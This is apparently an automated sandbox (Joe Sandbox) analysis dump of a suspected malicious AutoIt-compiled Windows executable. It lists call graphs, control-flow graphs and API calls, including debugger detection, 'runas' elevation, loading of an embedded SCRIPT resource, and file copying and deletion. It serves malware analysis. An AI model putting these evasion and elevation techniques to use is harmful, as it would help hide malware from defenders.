106446->106449 106447->106449 106448->106445 106452 fdd57b 106448->106452 106449->106423 106449->106443 106479 fa7924 59 API calls 2 library calls 106449->106479 106451->106327 106453 fa7bcc 59 API calls 106452->106453 106453->106449 106454->106375 106455->106375 106456->106375 106457->106375 106458->106375 106459->106375 106460->106375 106465->106298 106466->106304 106467->106332 106468->106383 106469->106383 106470->106383 106471->106383 106472->106383 106473->106383 106474->106357 106475->106360 106476->106382 106477->106361 106479->106449 106481 fa6d95 106480->106481 106486 fa6ea9 106480->106486 106482 fc0db6 Mailbox 59 API calls 106481->106482 106481->106486 106484 fa6dbc 106482->106484 106483 fc0db6 Mailbox 59 API calls 106490 fa6e31 106483->106490 106484->106483 106486->105225 106490->106486 106493 fa6240 106490->106493 106518 fa735d 59 API calls Mailbox 106490->106518 106519 ff6553 59 API calls Mailbox 106490->106519 106520 fa750f 59 API calls 2 library calls 106490->106520 106491->105227 106492->105229 106494 fa7a16 59 API calls 106493->106494 106514 fa6265 106494->106514 106495 fa646a 106523 fa750f 59 API calls 2 library calls 106495->106523 106497 fa6484 Mailbox 106497->106490 106500 fddff6 106526 fff8aa 91 API calls 4 library calls 106500->106526 106501 fa750f 59 API calls 106501->106514 106503 fa6799 _memmove 106528 fff8aa 91 API calls 4 library calls 106503->106528 106506 fa7d8c 59 API calls 106506->106514 106507 fde004 106527 fa750f 59 API calls 2 library calls 106507->106527 106509 fde01a 106509->106497 106510 fddf92 106511 fa8029 59 API calls 106510->106511 106513 fddf9d 106511->106513 106517 fc0db6 Mailbox 59 API calls 106513->106517 106514->106495 106514->106500 106514->106501 106514->106503 106514->106506 106514->106510 106515 fa7e4f 59 API calls 106514->106515 106521 fa5f6c 60 API calls 106514->106521 106522 fa5d41 59 API calls Mailbox 106514->106522 106524 fa5e72 60 API calls 106514->106524 106525 fa7924 59 API calls 2 library calls 106514->106525 106516 fa643b CharUpperBuffW 106515->106516 106516->106514 106517->106503 106518->106490 106519->106490 106520->106490 106521->106514 106522->106514 106523->106497 106524->106514 106525->106514 106526->106507 106527->106509 106528->106497 106529->105244 106530->105243 106594->105258 106595->105258 106596->105258 106845 fa1066 106850 faf76f 106845->106850 106847 fa106c 106848 fc2d40 __cinit 67 API calls 106847->106848 106849 fa1076 106848->106849 106851 faf790 106850->106851 106883 fbff03 106851->106883 106855 faf7d7 106856 fa7667 59 API calls 106855->106856 106857 faf7e1 106856->106857 106858 fa7667 59 API calls 106857->106858 106859 faf7eb 106858->106859 106860 fa7667 59 API calls 106859->106860 106861 faf7f5 106860->106861 106862 fa7667 59 API calls 106861->106862 106863 faf833 106862->106863 106864 fa7667 59 API calls 106863->106864 106865 faf8fe 106864->106865 106893 fb5f87 106865->106893 106869 faf930 106870 fa7667 59 API calls 106869->106870 106871 faf93a 106870->106871 106921 fbfd9e 106871->106921 106873 faf981 106874 faf991 GetStdHandle 106873->106874 106875 fe45ab 106874->106875 106876 faf9dd 106874->106876 106875->106876 106878 fe45b4 106875->106878 106877 faf9e5 OleInitialize 106876->106877 106877->106847 106928 1006b38 64 API calls Mailbox 106878->106928 106880 fe45bb 106929 1007207 CreateThread 106880->106929 106882 fe45c7 CloseHandle 106882->106877 106930 fbffdc 106883->106930 106886 fbffdc 59 API calls 106887 fbff45 106886->106887 106888 fa7667 59 API calls 106887->106888 106889 fbff51 106888->106889 106890 fa7bcc 59 API calls 106889->106890 106891 faf796 106890->106891 106892 fc0162 6 API calls 106891->106892 106892->106855 106894 fa7667 59 API calls 106893->106894 106895 fb5f97 106894->106895 106896 fa7667 59 API calls 106895->106896 106897 fb5f9f 106896->106897 106937 fb5a9d 106897->106937 106900 fb5a9d 59 API calls 106901 fb5faf 106900->106901 106902 fa7667 59 API calls 106901->106902 106903 fb5fba 106902->106903 106904 fc0db6 Mailbox 59 API calls 106903->106904 106905 faf908 106904->106905 106906 fb60f9 106905->106906 106907 fb6107 106906->106907 106908 fa7667 59 API calls 106907->106908 106909 fb6112 106908->106909 106910 fa7667 59 API calls 106909->106910 106911 fb611d 106910->106911 106912 fa7667 59 API calls 106911->106912 106913 fb6128 106912->106913 106914 fa7667 59 API calls 106913->106914 106915 fb6133 106914->106915 106916 fb5a9d 59 API calls 106915->106916 106917 fb613e 106916->106917 106918 fc0db6 Mailbox 59 API calls 106917->106918 106919 fb6145 RegisterWindowMessageW 106918->106919 106919->106869 106922 ff576f 106921->106922 106923 fbfdae 106921->106923 106940 1009ae7 60 API calls 106922->106940 106925 fc0db6 Mailbox 59 API calls 106923->106925 106927 fbfdb6 106925->106927 106926 ff577a 106927->106873 106928->106880 106929->106882 106941 10071ed 65 API calls 106929->106941 106931 fa7667 59 API calls 106930->106931 106932 fbffe7 106931->106932 106933 fa7667 59 API calls 106932->106933 106934 fbffef 106933->106934 106935 fa7667 59 API calls 106934->106935 106936 fbff3b 106935->106936 106936->106886 106938 fa7667 59 API calls 106937->106938 106939 fb5aa5 106938->106939 106939->106900 106940->106926 106942 fa1016 106947 fa4974 106942->106947 106945 fc2d40 __cinit 67 API calls 106946 fa1025 106945->106946 106948 fc0db6 Mailbox 59 API calls 106947->106948 106949 fa497c 106948->106949 106950 fa101b 106949->106950 106954 fa4936 106949->106954 106950->106945 106955 fa493f 106954->106955 106956 fa4951 106954->106956 106957 fc2d40 __cinit 67 API calls 106955->106957 106958 fa49a0 106956->106958 106957->106956 106959 fa7667 59 API calls 106958->106959 106960 fa49b8 GetVersionExW 106959->106960 106961 fa7bcc 59 API calls 106960->106961 106962 fa49fb 106961->106962 106963 fa7d2c 59 API calls 106962->106963 106968 fa4a28 106962->106968 106964 fa4a1c 106963->106964 106965 fa7726 59 API calls 106964->106965 106965->106968 106966 fa4a93 GetCurrentProcess IsWow64Process 106967 fa4aac 106966->106967 106970 fa4b2b GetSystemInfo 106967->106970 106971 fa4ac2 106967->106971 106968->106966 106969 fdd864 106968->106969 106972 fa4af8 106970->106972 106982 fa4b37 106971->106982 106972->106950 106975 fa4b1f GetSystemInfo 106977 fa4ae9 106975->106977 106976 fa4ad4 106978 fa4b37 2 API calls 106976->106978 106977->106972 106979 fa4aef FreeLibrary 106977->106979 106980 fa4adc GetNativeSystemInfo 106978->106980 106979->106972 106980->106977 106983 fa4ad0 106982->106983 106984 fa4b40 LoadLibraryA 106982->106984 106983->106975 106983->106976 106984->106983 106985 fa4b51 GetProcAddress 106984->106985 106985->106983 106986 1260948 107000 125e598 106986->107000 106988 1260a11 107003 1260838 106988->107003 107006 1261a38 GetPEB 107000->107006 107002 125ec23 107002->106988 107004 1260841 Sleep 107003->107004 107005 126084f 107004->107005 107007 1261a62 107006->107007 107007->107002 107008 fa1055 107013 fa2649 107008->107013 107011 fc2d40 __cinit 67 API calls 107012 fa1064 107011->107012 107014 fa7667 59 API calls 107013->107014 107015 fa26b7 107014->107015 107020 fa3582 107015->107020 107018 fa2754 107019 fa105a 107018->107019 107023 fa3416 59 API calls 2 library calls 107018->107023 107019->107011 107024 fa35b0 107020->107024 107023->107018 107025 fa35a1 107024->107025 107026 fa35bd 107024->107026 107025->107018 107026->107025 107027 fa35c4 RegOpenKeyExW 107026->107027 107027->107025 107028 fa35de RegQueryValueExW 107027->107028 107029 fa35ff 107028->107029 107030 fa3614 RegCloseKey 107028->107030 107029->107030 107030->107025

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA3B68
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00FA3B7A
                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,010652F8,010652E0,?,?), ref: 00FA3BEB
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                      • Part of subcall function 00FB092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FA3C14,010652F8,?,?,?), ref: 00FB096E
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA3C6F
                                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01057770,00000010), ref: 00FDD281
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,010652F8,?,?,?), ref: 00FDD2B9
                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01054260,010652F8,?,?,?), ref: 00FDD33F
                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FDD346
                                                                                                                                      • Part of subcall function 00FA3A46: GetSysColorBrush.USER32(0000000F), ref: 00FA3A50
                                                                                                                                      • Part of subcall function 00FA3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00FA3A5F
                                                                                                                                      • Part of subcall function 00FA3A46: LoadIconW.USER32(00000063), ref: 00FA3A76
                                                                                                                                      • Part of subcall function 00FA3A46: LoadIconW.USER32(000000A4), ref: 00FA3A88
                                                                                                                                      • Part of subcall function 00FA3A46: LoadIconW.USER32(000000A2), ref: 00FA3A9A
                                                                                                                                      • Part of subcall function 00FA3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA3AC0
                                                                                                                                      • Part of subcall function 00FA3A46: RegisterClassExW.USER32(?), ref: 00FA3B16
                                                                                                                                      • Part of subcall function 00FA39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA3A03
                                                                                                                                      • Part of subcall function 00FA39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA3A24
                                                                                                                                      • Part of subcall function 00FA39D5: ShowWindow.USER32(00000000,?,?), ref: 00FA3A38
                                                                                                                                      • Part of subcall function 00FA39D5: ShowWindow.USER32(00000000,?,?), ref: 00FA3A41
                                                                                                                                      • Part of subcall function 00FA434A: _memset.LIBCMT ref: 00FA4370
                                                                                                                                      • Part of subcall function 00FA434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA4415
                                                                                                                                    Strings
                                                                                                                                    • runas, xrefs: 00FDD33A
                                                                                                                                    • This is a third-party compiled AutoIt script., xrefs: 00FDD279
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                                    • API String ID: 529118366-3287110873
                                                                                                                                    • Opcode ID: 8a4346c65a115b3b2eb4c2b9589a029b5505d8888d210271a4f56192ba0bcaf3
                                                                                                                                    • Instruction ID: 4d5e202afb158beb9fd10a048aab9bbd6c6617ce790dcd9f1a8e34c8b23896c0
                                                                                                                                    • Opcode Fuzzy Hash: 8a4346c65a115b3b2eb4c2b9589a029b5505d8888d210271a4f56192ba0bcaf3
                                                                                                                                    • Instruction Fuzzy Hash: 18514AB1D0420AAECF21EFB5DC06EFD7BB9AF477A0F004059F491A6152CA795605FB21

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 996 fa49a0-fa4a00 call fa7667 GetVersionExW call fa7bcc 1001 fa4b0b-fa4b0d 996->1001 1002 fa4a06 996->1002 1003 fdd767-fdd773 1001->1003 1004 fa4a09-fa4a0e 1002->1004 1005 fdd774-fdd778 1003->1005 1006 fa4b12-fa4b13 1004->1006 1007 fa4a14 1004->1007 1009 fdd77b-fdd787 1005->1009 1010 fdd77a 1005->1010 1008 fa4a15-fa4a4c call fa7d2c call fa7726 1006->1008 1007->1008 1018 fa4a52-fa4a53 1008->1018 1019 fdd864-fdd867 1008->1019 1009->1005 1012 fdd789-fdd78e 1009->1012 1010->1009 1012->1004 1014 fdd794-fdd79b 1012->1014 1014->1003 1016 fdd79d 1014->1016 1020 fdd7a2-fdd7a5 1016->1020 1018->1020 1021 fa4a59-fa4a64 1018->1021 1022 fdd869 1019->1022 1023 fdd880-fdd884 1019->1023 1024 fdd7ab-fdd7c9 1020->1024 1025 fa4a93-fa4aaa GetCurrentProcess IsWow64Process 1020->1025 1026 fa4a6a-fa4a6c 1021->1026 1027 fdd7ea-fdd7f0 1021->1027 1028 fdd86c 1022->1028 1030 fdd86f-fdd878 1023->1030 1031 fdd886-fdd88f 1023->1031 1024->1025 1029 fdd7cf-fdd7d5 1024->1029 1032 fa4aaf-fa4ac0 1025->1032 1033 fa4aac 1025->1033 1034 fdd805-fdd811 1026->1034 1035 fa4a72-fa4a75 1026->1035 1038 fdd7fa-fdd800 1027->1038 1039 fdd7f2-fdd7f5 1027->1039 1028->1030 1036 fdd7df-fdd7e5 1029->1036 1037 fdd7d7-fdd7da 1029->1037 1030->1023 1031->1028 1040 fdd891-fdd894 1031->1040 1041 fa4b2b-fa4b35 GetSystemInfo 1032->1041 1042 fa4ac2-fa4ad2 call fa4b37 1032->1042 1033->1032 1046 fdd81b-fdd821 1034->1046 1047 fdd813-fdd816 1034->1047 1043 fa4a7b-fa4a8a 1035->1043 1044 fdd831-fdd834 1035->1044 1036->1025 1037->1025 1038->1025 1039->1025 1040->1030 1045 fa4af8-fa4b08 1041->1045 1053 fa4b1f-fa4b29 GetSystemInfo 1042->1053 1054 fa4ad4-fa4ae1 call fa4b37 1042->1054 1049 fa4a90 1043->1049 1050 fdd826-fdd82c 1043->1050 1044->1025 1052 fdd83a-fdd84f 1044->1052 1046->1025 1047->1025 1049->1025 1050->1025 1055 fdd859-fdd85f 1052->1055 1056 fdd851-fdd854 1052->1056 1057 fa4ae9-fa4aed 1053->1057 1061 fa4b18-fa4b1d 1054->1061 1062 fa4ae3-fa4ae7 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1057->1045 1059 fa4aef-fa4af2 FreeLibrary 1057->1059 1059->1045 1061->1062 1062->1057
                                                                                                                                    APIs
                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00FA49CD
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,0102FAEC,00000000,00000000,?), ref: 00FA4A9A
                                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00FA4AA1
                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FA4AE7
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00FA4AF2
                                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FA4B23
                                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FA4B2F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1986165174-0
                                                                                                                                    • Opcode ID: 19e72ae79c5c338e8a90857335d345af0cc5eccae33006e6f5206b99149d898c
                                                                                                                                    • Instruction ID: 0f679460154b689cd85d7bd419e1839f2c75ea18e975ef6d3025b304bca3b106
                                                                                                                                    • Opcode Fuzzy Hash: 19e72ae79c5c338e8a90857335d345af0cc5eccae33006e6f5206b99149d898c
                                                                                                                                    • Instruction Fuzzy Hash: 919102719897C1DEC731DF6884502AABFF5AF6A310F58499ED0C683B02D264B908E769

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1063 fa4e89-fa4ea1 CreateStreamOnHGlobal 1064 fa4ea3-fa4eba FindResourceExW 1063->1064 1065 fa4ec1-fa4ec6 1063->1065 1066 fa4ec0 1064->1066 1067 fdd933-fdd942 LoadResource 1064->1067 1066->1065 1067->1066 1068 fdd948-fdd956 SizeofResource 1067->1068 1068->1066 1069 fdd95c-fdd967 LockResource 1068->1069 1069->1066 1070 fdd96d-fdd98b 1069->1070 1070->1066
                                                                                                                                    APIs
                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FA4D8E,?,?,00000000,00000000), ref: 00FA4E99
                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FA4D8E,?,?,00000000,00000000), ref: 00FA4EB0
                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F), ref: 00FDD937
                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F), ref: 00FDD94C
                                                                                                                                    • LockResource.KERNEL32(00FA4D8E,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F,00000000), ref: 00FDD95F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                    • String ID: SCRIPT
                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                    • Opcode ID: b755e6f71e0aa34a98ad7dd6743a257e11be60ee15270158badac29da63e8a6f
                                                                                                                                    • Instruction ID: 96881683f966eceb3b9d2da17f78c40e3c01ed8ddbf2a5ad7e2853a9bb19d048
                                                                                                                                    • Opcode Fuzzy Hash: b755e6f71e0aa34a98ad7dd6743a257e11be60ee15270158badac29da63e8a6f
                                                                                                                                    • Instruction Fuzzy Hash: CD114CB5640701ABD7318F65EC88F677BBAEBC6B51F204268F44596250DBA2E8049660
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00FDE398), ref: 0100446A
                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0100447B
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100448B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                    • Opcode ID: bf03e10ee1d07cb1372e3b7cde5c4a4fe745aa273c3e54a459dc6882f69640a3
                                                                                                                                    • Instruction ID: 34c455d664bfa9a2c399a00f8cf1703d80cca51428215897ba6fd0db01e847da
                                                                                                                                    • Opcode Fuzzy Hash: bf03e10ee1d07cb1372e3b7cde5c4a4fe745aa273c3e54a459dc6882f69640a3
                                                                                                                                    • Instruction Fuzzy Hash: 17E0D8324105016752326E38EC0D4EE77AC9E06275F20474AF9B5C10C0EF7859048699
                                                                                                                                    Strings
                                                                                                                                    • Variable must be of type 'Object'., xrefs: 00FE3E62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                                                    • API String ID: 0-109567571
                                                                                                                                    • Opcode ID: da023db69b94cd8f8a817aff00be4d88328b1a6618ea4727a6a636092256e086
                                                                                                                                    • Instruction ID: 6e729d9a8fd6327aaa937de596b08a7c1498d39dea93df2c32b92daf3320a977
                                                                                                                                    • Opcode Fuzzy Hash: da023db69b94cd8f8a817aff00be4d88328b1a6618ea4727a6a636092256e086
                                                                                                                                    • Instruction Fuzzy Hash: 49A28DB5E00206CFCB24CF58C484AAEB7B2FF5A324F248069D955AB351D735ED46EB90
                                                                                                                                    APIs
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB0A5B
                                                                                                                                    • timeGetTime.WINMM ref: 00FB0D16
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB0E53
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00FB0E61
                                                                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00FB0EFA
                                                                                                                                    • DestroyWindow.USER32 ref: 00FB0F06
                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FB0F20
                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00FE4E83
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00FE5C60
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00FE5C6E
                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FE5C82
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                    • API String ID: 4212290369-3242690629
                                                                                                                                    • Opcode ID: 8759f66dee00d5fdb359d65d5a0402c4c45989a98773a93918bee6aa927f59bf
                                                                                                                                    • Instruction ID: 9ed69ea58b8d705ba5c6a7cd149d6e952d11f22bf692b2d2850dc176d45392d7
                                                                                                                                    • Opcode Fuzzy Hash: 8759f66dee00d5fdb359d65d5a0402c4c45989a98773a93918bee6aa927f59bf
                                                                                                                                    • Instruction Fuzzy Hash: DFB20270608782DFD734DF25C884BABB7E4BF85718F14491DE589872A1CB79E844EB82

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01008F5F: __time64.LIBCMT ref: 01008F69
                                                                                                                                      • Part of subcall function 00FA4EE5: _fseek.LIBCMT ref: 00FA4EFD
                                                                                                                                    • __wsplitpath.LIBCMT ref: 01009234
                                                                                                                                      • Part of subcall function 00FC40FB: __wsplitpath_helper.LIBCMT ref: 00FC413B
                                                                                                                                    • _wcscpy.LIBCMT ref: 01009247
                                                                                                                                    • _wcscat.LIBCMT ref: 0100925A
                                                                                                                                    • __wsplitpath.LIBCMT ref: 0100927F
                                                                                                                                    • _wcscat.LIBCMT ref: 01009295
                                                                                                                                    • _wcscat.LIBCMT ref: 010092A8
                                                                                                                                      • Part of subcall function 01008FA5: _memmove.LIBCMT ref: 01008FDE
                                                                                                                                      • Part of subcall function 01008FA5: _memmove.LIBCMT ref: 01008FED
                                                                                                                                    • _wcscmp.LIBCMT ref: 010091EF
                                                                                                                                      • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009824
                                                                                                                                      • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009837
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01009452
                                                                                                                                    • _wcsncpy.LIBCMT ref: 010094C5
                                                                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 010094FB
                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01009511
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01009522
                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01009534
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
